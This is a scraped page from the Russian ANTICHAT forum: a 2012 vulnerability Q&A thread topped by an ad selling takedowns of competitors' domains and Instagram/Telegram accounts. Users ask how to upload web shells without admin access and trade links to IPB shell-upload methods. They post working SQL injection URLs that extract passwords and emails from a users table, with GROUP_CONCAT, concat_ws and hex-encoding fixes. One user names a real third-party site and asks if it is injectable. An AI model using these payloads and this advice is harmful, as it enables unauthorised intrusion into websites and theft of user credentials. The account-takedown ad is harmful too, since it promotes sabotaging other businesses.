УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1944 из 2438

1944

Опции темы

Поиск в этой теме

Опции просмотра

#19431

31.01.2012, 18:33

Tr[1]x

Guest

Сообщений: n/a

Провел на форуме:
7275

Репутация: 0

Существуют ли аналоги Goolag Scanner?

И еще вопрос: есть ли на сайте топик в котором указаны методы загрузки шеллов на сайт с примерами? желательно без помощи админ панели.

#19432

31.01.2012, 18:34

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Цитата:

Сообщение от Tr[1

x"]
Tr[1]x said:
Существуют ли аналоги Goolag Scanner?
И еще вопрос: есть ли на сайте топик в котором указаны методы загрузки шеллов на сайт с примерами? желательно без помощи админ панели.

http://madnet.name/tools/madss/ , не?

#19433

31.01.2012, 18:39

er9j6@

Guest

Сообщений: n/a

Провел на форуме:
107835

Репутация: 23

Цитата:

Сообщение от Ereee

Ereee said:
er9j6@
,
у тебя хостинг от мастерхост, смотрел phpinfo, там отключены системные функции.

В какой шаблон ты вписал этот код ? НЕ найду.

ipsclass->input['kod'] = 1">

ipsclass->input['pzdc'])">

Как я понимаю, ты нашел новый способ заливки шеллов в IPB

#19434

31.01.2012, 18:42

Ereee

Guest

Сообщений: n/a

Провел на форуме:
102354

Репутация: 267

Цитата:

Сообщение от er9j6@

er9j6@ said:
В какой шаблон ты вписал этот код ? НЕ найду.
ipsclass->input['kod'] = 1">
ipsclass->input['pzdc'])">

Как я понимаю, ты нашел новый способ заливки шеллов в IPB

https://rdot.org/forum/showpost.php?p=7037&postcount=12

#19435

31.01.2012, 19:07

Spot

Новичок

Регистрация: 01.03.2007

Сообщений: 2

Провел на форуме:
3478

Репутация: 0

Привет %Username%, вопрос в следующем нащупал sql иньекцию, и все впринципе нормально, но есть пару но:

Вытащить могу данные только одного юзверя, если укажу его айди например:

Код:

Code:
xxxx.php?wid=1&pid=-1+union+select+password+from +users +where uid =506

получаю пароль: %pass%

Но когда составляю запрос, что бы получить список всех юзверей, например:

Код:

Code:
.php?wid=2&pid=-1+union+select+email+from +users + group + by + uid+ desc

На что мне выдает стринг с текстом : Array

Так же проблема выдать комбинированный запрос:

Код:

Code:
.php?wid=2&pid=-1+union+select+email,uid+from +users where uid = 808

В ответ The used SELECT statements have a different number of columns

Буду рад просвещению, с иньекциями раньше никогда толком не работал, но вот пришлось.

#19436

31.01.2012, 21:30

stan0009

Guest

Сообщений: n/a

Провел на форуме:
39063

Репутация: 0

Задаю не в первый раз.

Вопрос насчет каким парсером пользуетесь, товарищи, для sql инъекции?.

Актуально

PS: sql poizon сломался, в гугл парсерах смысла не вижу, так как банит.

#19437

31.01.2012, 21:47

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Цитата:

Сообщение от None

И еще вопрос: есть ли на сайте топик в котором указаны методы загрузки шеллов на сайт с примерами? желательно без помощи админ панели.

ну а как, пробуй все те же методы что и в админ панель.

http://www.forum.antichat.net/showthread.php?p=2935725

Spot, а что мешает через лимит спарсить?

или если массово, пробуй GROUP_CONCAT()

только тут ограничение на кол-во выводимых данных, по умлочанию — 1024

Цитата:

Сообщение от None

Так же проблема выдать комбинированный запрос:
union+select+email,uid+from +users where uid = 808

правильный синтаксис такой — concat_ws(0x3a,email,uid)

или concat

stan0009, попробуй Яшкалюб, а чекать на скули sqlndm

#19438

31.01.2012, 23:41

Tr[1]x

Guest

Сообщений: n/a

Провел на форуме:
7275

Репутация: 0

Подскажите какую-нибудь программу, похожую на Radmin, но чтобы она работала на ос FreeBSD.

#19439

31.01.2012, 23:44

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

Провел на форуме:
371875

Репутация: 137

Цитата:

Сообщение от faza02

faza02 said:
ну а как, пробуй все те же методы что и в админ
правильный синтаксис такой — concat_ws(0x3a,email,uid)
или concat
stan0009
, попробуй Яшкалюб, а чекать на скули sqlndm

тут concat_ws() не причем хотя очень полезная функция, тут uid надо задать в хексе или в кавычки если не экранируется,

вот пример:

Цитата:

Сообщение от None

.php?wid=2&pid=-1+union+select+email,uid+from +users+where+uid=0x383038

Цитата:

Сообщение от None

.php?wid=2&pid=-1+union+select+concat_ws(0x3a,email,uid),2+from +users+where+uid=0x383038

#19440

01.02.2012, 15:23

pirat0

Guest

Сообщений: n/a

Провел на форуме:
23576

Репутация: -1

http://mastiff-dog.com/index.php?PageT=ReadNews&act=Empty&ID=-87

ребята прошу просто посмотреть есть ли тут инъекцыя??

Страница 1944 из 2438

1944

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)

Быстрый переход